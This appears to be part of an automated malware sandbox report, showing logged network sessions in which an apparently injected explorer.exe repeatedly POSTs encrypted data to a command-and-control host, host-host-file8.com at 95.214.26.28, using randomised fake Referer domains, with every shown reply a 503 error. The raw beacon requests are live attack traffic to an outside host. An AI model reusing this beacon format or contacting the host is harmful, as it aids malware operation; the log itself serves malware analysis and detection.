                                                                                                                                                            Nov 10, 2023 15:38:29.725270033 CET284OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 98 66 5d 02 c8 a1 c1 64 2d ca c3 12
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]d-Xr)3|oU_H<gj+UMP(T 8cL'dIIGLA@e<3iJ?xw--DS<Ql{M#W?gFIVM
                                                                                                                                                            Nov 10, 2023 15:38:30.027803898 CET284INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            31192.168.2.64975595.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:38:30.336473942 CET285OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://rkucq.com/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 352
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:38:30.336504936 CET285OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 99 66 5d 02 c8 a1 c1 64 39 c9 c5 6e
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]d9nKyn'x2P8'eyJ|.xg:D%'(1PNBSGOz0Y?+yCjVu}JdUR91N|5S5qZ_GLrSFWM!bt
                                                                                                                                                            Nov 10, 2023 15:38:30.636611938 CET286INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            32192.168.2.64975695.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:38:30.958910942 CET286OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://vngcolxw.net/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 237
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:38:30.959048033 CET287OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 96 66 5d 02 c8 a1 c1 64 34 9b dd 2b
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]d4+Avo%XFYK)Q ~n3]|k)$!o\H+5(47/F0#'G..x9-X9LnNv*F:W#ELg\87qR|jRF>h$LoP5
                                                                                                                                                            Nov 10, 2023 15:38:31.267112017 CET287INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            33192.168.2.64975795.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:38:31.588249922 CET287OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://liedn.net/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 122
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:38:31.588287115 CET288OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 97 66 5d 02 c8 a1 c1 64 1d dd aa 01
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]d){z3B(\""zfJb!)B1e
                                                                                                                                                            Nov 10, 2023 15:38:31.886995077 CET288INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            34192.168.2.64975895.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:38:32.199776888 CET289OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://ldxhifgucj.com/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 312
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:38:32.199815035 CET290OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 94 66 5d 02 c8 a1 c1 64 38 91 a2 17
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]d8Way,[GA+4WN%C?aVjWR~G`J_uwy"(G1[ d N~!7{$d%|P/o,OTezy!-/:=>t_v[,
                                                                                                                                                            Nov 10, 2023 15:38:32.507610083 CET290INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            35192.168.2.64976095.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:38:32.824908018 CET296OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://pemamjvcpk.org/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 353
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:38:32.824937105 CET297OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 95 66 5d 02 c8 a1 c1 64 35 cb c9 03
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]d57js@T:E=wTHLiPY~(~)1HuK=l<s`/($6NNK\`6cGt?[YD&%4H5@4 n!YqNSts*
                                                                                                                                                            Nov 10, 2023 15:38:33.124291897 CET297INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            36192.168.2.64976195.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:38:33.440500021 CET298OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://qcgvlxft.com/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 155
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:38:33.440540075 CET298OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 92 66 5d 02 c8 a1 c1 64 22 80 9f 0a
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]d",m8e40n5//v!MS ,0k&*hb+M/yL~
                                                                                                                                                            Nov 10, 2023 15:38:33.741771936 CET299INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            37192.168.2.64976295.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:38:34.055603981 CET299OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://ogmthh.net/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 141
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:38:34.055639982 CET299OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 93 66 5d 02 c8 a1 c1 64 56 82 c3 70
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]dVpHeoV)GXG:BFG^h\zg0/K9:Sj_7z|
                                                                                                                                                            Nov 10, 2023 15:38:34.354845047 CET300INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            38192.168.2.64976395.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:38:34.671171904 CET300OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://nlijd.org/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 207
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:38:34.671205997 CET301OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 90 66 5d 02 c8 a1 c1 64 2c c4 ae 09
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]d,$?9vYeRH?/cD9s,uYfY.:9]"/pzT;V</Z)NK?vO6{3&_f>Q0ny=p.Q
                                                                                                                                                            Nov 10, 2023 15:38:34.970344067 CET301INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            39192.168.2.64976495.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:38:35.296973944 CET302OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://nugxs.org/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 206
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:38:35.297002077 CET302OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 91 66 5d 02 c8 a1 c1 64 0d 89 ac 61
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]daVgAOQ^Fws4!6&a@O?1l3l5s#](Q,( lR@)#!$S.D-rv|;#
                                                                                                                                                            Nov 10, 2023 15:38:35.594405890 CET302INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            4192.168.2.64972795.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:36:45.795119047 CET239OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://kegnkcpidq.com/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 262
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:36:45.795156002 CET240OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 07 de a8 0f
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]dE?b^O=P$JE:rMm4H.M=[+,eZ:{5%[w]}3oq:iXsK|8-06acD"{V9gs~b+qe<@WC
                                                                                                                                                            Nov 10, 2023 15:36:46.094574928 CET240INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            40192.168.2.64976595.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:38:35.911516905 CET303OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://fotbgladl.net/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 149
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:38:35.911550045 CET303OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 85 de 8e 66 5d 02 c8 a1 c1 64 40 c2 92 23
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]d@#+Miq?ud<([/Hog\"2UlUT}-I!.0|
                                                                                                                                                            Nov 10, 2023 15:38:36.219624996 CET303INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            5192.168.2.64972895.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:36:46.439987898 CET241OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://bxqfgpms.org/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 223
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:36:46.440033913 CET241OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 2e dd ca 24
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]d.$=~CC9VHliwa11^&.|5a_9cOf'(="1q1QEd;#+72NhwQ}4y4t;?.
                                                                                                                                                            Nov 10, 2023 15:36:46.736902952 CET241INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            6192.168.2.64972995.214.26.2880C:\Windows\explorer.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            Nov 10, 2023 15:36:47.129914999 CET242OUTPOST / HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Accept: */*
                                                                                                                                                            Referer: http://jgdfwhycbb.com/
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                            Content-Length: 209
                                                                                                                                                            Host: host-host-file8.com
                                                                                                                                                            Nov 10, 2023 15:36:47.129966021 CET242OUTData Raw: 10 87 f7 e3 1b f7 a6 c3 c2 39 7d 36 0a ca 96 fc 46 14 af 3e d1 31 1f e8 b9 e8 da 83 8a a0 97 86 1b b1 2e d3 6c 6f ce e1 e8 da f3 dc db 94 13 05 7d f0 6b 92 b4 af aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 19 8a a7 26
                                                                                                                                                            Data Ascii: 9}6F>1.lo}k\wu$f]d&3oRgaoU_"vLVwyb{BJSN-lEcm6F(;THM;p`<)1t>a^#|ZWuV7v8hL4Y
                                                                                                                                                            Nov 10, 2023 15:36:47.429282904 CET243INHTTP/1.0 503 Service Unavailable
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
